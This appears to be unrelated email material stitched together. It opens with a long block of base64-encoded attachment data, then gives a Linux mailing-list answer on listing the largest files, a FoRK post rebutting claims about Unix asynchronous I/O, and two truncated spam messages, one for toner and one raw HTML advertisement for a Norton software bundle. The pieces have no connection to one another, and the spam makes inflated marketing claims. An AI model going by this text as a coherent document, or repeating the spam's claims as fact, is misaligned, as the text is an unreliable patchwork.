 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
 fQ+0dG78Q7ENPdg+qnyhDeOn/9k=
 --XX9ADB9A99-1A5B9ADBXX--
</t>
  </si>
  <si>
    <t xml:space="preserve">Inn Share's [shareinnn@yahoo.com] 22 lines of wisdom included:
 &gt; 
 &gt; Hi,all:
 &gt; 
 &gt; Does anyone know how to list the biggest file in my
 &gt; root directory?or the second biggest ..etc...
 &gt; 
 &gt; Because I want to find out what is the reason cause my
 &gt; root all most full.
 $ find /dir -name \*  | xargs du -s | sort -n
 Smallest files are listed first with the largest at the end. So if
 you want to get the 5 largest files, pipe through tail.
 e.g.
 $ find /dir -name \*  | xargs du -s | sort -n | tail -5
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: asynchronous I/O (was Re: Gasp!)
</t>
  </si>
  <si>
    <t xml:space="preserve">Of course we've had select() since BSD 4.2 and poll() since System V
 or so, and they work reasonably well for asynchronous I/O up to a
 hundred or so channels, but suck after that; /dev/poll (available in
 Solaris and Linux) is one approach to solving this; Linux has a way to
 do essentially the same thing with real-time signals, and has for
 years; and FreeBSD has kqueue.
 More details about these are at
 http://www.citi.umich.edu/projects/linux-scalability/
 None of this helps with disk I/O; most programs that need to overlap
 disk I/O with computation, on either proprietary Unixes or Linux, just
 use multiple threads or processes to handle the disk I/O.
 POSIX specifies a mechanism for nonblocking disk I/O that most
 proprietary Unixes implement.  The Linux kernel hackers are currently
 rewriting Linux's entire I/O subsystem essentially from scratch to
 work asynchronously, because they can easily build efficient
 synchronous I/O primitives from asynchronous ones, but not the other
 way around. So now Linux will support this mechanism too.
 It probably doesn't need saying for anyone who's read Beberg saying
 things like "Memory management is a non-issue for anyone that has any
 idea at all how the hardware functions," but he's totally off-base.
 People should know by now not to take anything he says seriously, but
 apparently some don't, so I'll rebut.
 Not surprisingly, the rebuttal requires many more words than the
 original stupid errors.
 In detail, he wrote:
 &gt; Could it be? After 20 years without this feature UNIX finally
 &gt; catches up to Windows and has I/O that doesnt [sic] totally suck for
 &gt; nontrivial apps? No way!
 Unix acquired nonblocking I/O in the form of select() about 23 years
 ago, and Solaris has had the particular aio_* calls we are discussing
 for many years.  Very few applications need the aio_* calls ---
 essentially only high-performance RDBMS servers even benefit from them
 at all, and most of those have been faking it fine for a while with
 multiple threads or processes.  This just provides a modicum of extra
 performance.
 &gt; OK, so they do it with signals or a flag, which is completely
 &gt; ghetto, but at least they are trying. Keep trying guys, you got the
 &gt; idea, but not the clue.
 Readers can judge who lacks the clue here.
 &gt; The Windows I/O model does definately [sic] blow the doors off the
 &gt; UNIX one, but then they had select to point at in it's [sic]
 &gt; suckiness and anything would have been an improvement. UNIX is just
 &gt; now looking at it's [sic] I/O model and adapting to a multiprocess
 &gt; multithreaded world so it's gonna be years yet before a posix API
 &gt; comes out of it.
 Although I don't have a copy of the spec handy, I think the aio_* APIs
 come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is
 13 years old, and which I think documented then-current practice.
 They might be even older than that.
 Unix has been multiprocess since 1969, and most Unix implementations
 have supported multithreading for a decade or more.
 &gt; Bottom line is the "do stuff when something happens" model turned
 &gt; out to be right, and the UNIX "look for something to do and keep
 &gt; looking till you find it no matter how many times you have to look"
 &gt; is not really working so great anymore.
 Linux's aio_* routines can notify the process of their completion with
 a "signal", a feature missing in Microsoft Windows; a "signal" causes
 the immediate execution of a "signal handler" in a process.  By
 contrast, the Microsoft Windows mechanisms to do similar things (such
 as completion ports) do not deliver a notification until the process
 polls them.
 I don't think signals are a better way to do things in this case
 (although I haven't written any RDBMSes myself), but you got the
 technical descriptions of the two operating systems exactly backwards.
 Most programs that use Linux real-time signals for asynchronous
 network I/O, in fact, block the signal in question and poll the signal
 queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo().
 -- 
 &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after 
 which the world will never be the same.
 http://www.xent.com/pipermail/fork/2002-August/013974.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          QDHP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</si>
  <si>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ds
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DON'T LET A COMPUTER VIRUS RUIN YOUR DAY!          12879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</si>
  <si>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&lt;title&gt;Does Your Computer Need an Oil Change&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"1"&gt;
   &lt;tr&gt;
     &lt;td width=3D"538" height=3D"1" align=3D"center" bgcolor=3D"#000000"&gt;&lt;b=
 &gt;&lt;font face=3D"Century Gothic" size=3D"5" color=3D"#FFFFFF"&gt;Does Your Comp=
 uter Need an Oil
       Change?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"151"&gt;
   &lt;tr&gt;
     &lt;td width=3D"530" height=3D"145"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;N=
 orton&lt;/font&gt;&lt;font color=3D"#006600" face=3D"Verdana" size=3D"7"&gt;&lt;br&gt;&lt;/font=
 &gt;&lt;i&gt;&lt;font face=3D"Verdana" color=3D"#CC0000" size=3D"7"&gt;SystemWorks
       2002&lt;/font&gt;&lt;/i&gt;&lt;font size=3D"4" face=3D"Verdana"&gt;&lt;br&gt; &lt;/font&gt;&lt;font f=
 ace=3D"Tahoma" size=3D"5"&gt;Professional
       Edition&lt;/font&gt; &lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"26"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"20" align=3D"center" bgcolor=3D"#000000"&gt;=
 &lt;b&gt;&lt;font color=3D"#FFFFFF" face=3D"Century Gothic"&gt;Made
       by the Creators of the #1 Anti-Virus Software on the Market!&lt;/font&gt;&lt;=
 /b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"77"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"71" align=3D"center"&gt;&lt;font face=3D"Lucida=
  Sans Unicode" color=3D"#CC0000"&gt;This
       &lt;u&gt;UNBEATABLE&lt;/u&gt; software suite comes with &lt;i&gt; EVERY&lt;/i&gt;
       program you'll &lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"#F=
 F0000"&gt; ever&lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"#CC0000"&gt; n=
 eed to answer the problems or threats that your
       computer faces each day of it's Life!&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"Ta=
 homa" color=3D"#000000"&gt;&lt;b&gt;Included in this magnificent deal
       are the following programs:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"138"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"132" bgcolor=3D"#333333"&gt;&lt;font color=3D"#=
 FFFFFF"&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;Norton
       AntiVirus=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b=
 &gt;THE #1
       ANTI-VIRUS PROTECION EVER!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma=
 "&gt;&lt;br&gt;Norton Utilities=FFFFFF99 2002
       - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;DIAGNOSE ANY PROBLEM WI=
 TH YOUR
       SYSTEM!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;&lt;br&gt;
       &lt;font size=3D"4"&gt;Norton Ghost=FFFFFF99 2002 - &lt;/font&gt;&lt;/font&gt;&lt;font fa=
 ce=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;MAKES
       BACKING UP YOUR VALUABLE DATA EASY!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton CleanSweep=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D=
 "2"&gt;&lt;b&gt;CLEANS
       OUT EXCESS INTERNET FILE BUILDUP!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton WinFax=FFFFFF99 Basic - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"=
